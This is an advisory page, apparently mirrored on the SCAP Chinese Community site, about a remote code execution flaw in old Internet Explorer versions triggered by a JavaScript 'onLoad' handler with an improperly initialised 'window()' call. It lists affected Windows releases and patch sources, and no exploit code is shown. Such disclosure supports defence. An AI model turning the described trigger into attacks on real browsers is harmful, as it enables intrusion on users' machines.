- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
+ Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
Microsoft Internet Explorer 6.0 SP2 - do not use
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional

- Vulnerability discussion

Microsoft Internet Explorer is affected by a remote code execution vulnerability.

This vulnerability presents itself when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function.

This issue may be exploited to execute arbitrary remote code in the context of the user running the affected application. Failed exploitation attempts will likely crash the application.

- Exploit

The following exploits are available:

- Solution

Microsoft has released fixes for supported operating system versions. Fixes for Internet Explorer 5.5 SP 2 running on Windows ME and Internet Explorer 6 SP 1 running on Windows 98/98SE/ME can be obtained through the Microsoft Update Web site or the Windows Update Web site.

Avaya has released advisory ASA-2005-234 detailing affected Avaya products. Please see the referenced advisory for further information.


Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0

Microsoft Internet Explorer 5.0.1 SP4

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's corresponding websites.